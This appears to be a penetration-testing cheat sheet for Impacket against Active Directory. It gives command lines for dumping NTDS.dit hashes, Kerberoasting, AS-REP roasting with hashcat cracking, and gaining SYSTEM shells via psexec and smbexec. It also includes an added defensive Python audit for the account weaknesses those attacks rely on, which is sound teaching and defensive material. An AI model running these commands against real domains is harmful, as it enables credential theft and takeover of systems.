Impacket is a collection of Python classes for working with network protocols.
impacket-secretsdump -ntds ntds.dit -system SYSTEM LOCAL
This script will gather data about the domain’s users and their corresponding email addresses.
GetADUsers.py -all -dc-ip <ip> <domain>/<user>:<pw>
This example will try to find and fetch Service Principal Names that are associated with normal user accounts.
GetUserSPNs.py -request -dc-ip <ip> <domain>/<user>:<pw>
-> Crack hash e.g. using hashcat, to obtain passwords
An application that communicates with the Security Account Manager Remote interface from the MSRPC suite.
This example will attempt to list and get TGTs for those users that have the property ‘Do not require Kerberos preauthentication’ set (UF_DONT_REQUIRE_PREAUTH). Output is compatible with JtR.
GetNPUsers.py <domain>/<user> -no-pass
-> Crack hash e.g. using hashcat
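Added example (not part of the original page or of Impacket): a defender-side audit for the two account conditions that the GetUserSPNs.py and GetNPUsers.py entries above depend on, namely user accounts that carry an SPN and accounts with UF_DONT_REQUIRE_PREAUTH set. It assumes a simple, unfolded LDIF export of user objects; the sample records, the function names and the finding labels are constructed for illustration.

```python
# Documented userAccountControl flag bits.
UF_ACCOUNTDISABLE = 0x00000002
UF_DONT_REQUIRE_PREAUTH = 0x00400000

# Constructed sample export (not real accounts).
SAMPLE_LDIF = """\
dn: CN=alice,CN=Users,DC=example,DC=test
sAMAccountName: alice
userAccountControl: 512

dn: CN=svc-sql,CN=Users,DC=example,DC=test
sAMAccountName: svc-sql
userAccountControl: 66048
servicePrincipalName: MSSQLSvc/db01.example.test:1433

dn: CN=legacy,CN=Users,DC=example,DC=test
sAMAccountName: legacy
userAccountControl: 4194816

dn: CN=old-svc,CN=Users,DC=example,DC=test
sAMAccountName: old-svc
userAccountControl: 4194818
"""

def parse_ldif(text):
    """Split simple LDIF (no folding, no base64) into attribute -> [values] dicts."""
    entries = []
    for block in text.strip().split("\n\n"):
        entry = {}
        for line in block.splitlines():
            key, sep, value = line.partition(": ")
            if sep:
                entry.setdefault(key, []).append(value)
        entries.append(entry)
    return entries

def audit(entries):
    """Return {sAMAccountName: [findings]} for enabled accounts."""
    findings = {}
    for e in entries:
        uac = int(e.get("userAccountControl", ["0"])[0])
        if uac & UF_ACCOUNTDISABLE:
            continue  # disabled accounts are skipped (a choice made for this example)
        issues = []
        if uac & UF_DONT_REQUIRE_PREAUTH:
            issues.append("preauth-not-required")
        if e.get("servicePrincipalName"):
            issues.append("user-account-with-spn")
        if issues:
            findings[e["sAMAccountName"][0]] = issues
    return findings
```

Accounts reported as preauth-not-required should have Kerberos pre-authentication re-enabled unless a legacy dependency is documented; user accounts with an SPN should use long random passwords or be migrated to group managed service accounts.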
PSEXEC like functionality example using RemComSvc. -> Get a shell as "nt authority\system"
sudo psexec.py [<domain>/]<user>:[<pw>]@<ip>
sudo smbexec.py <user>:<pw>@<target>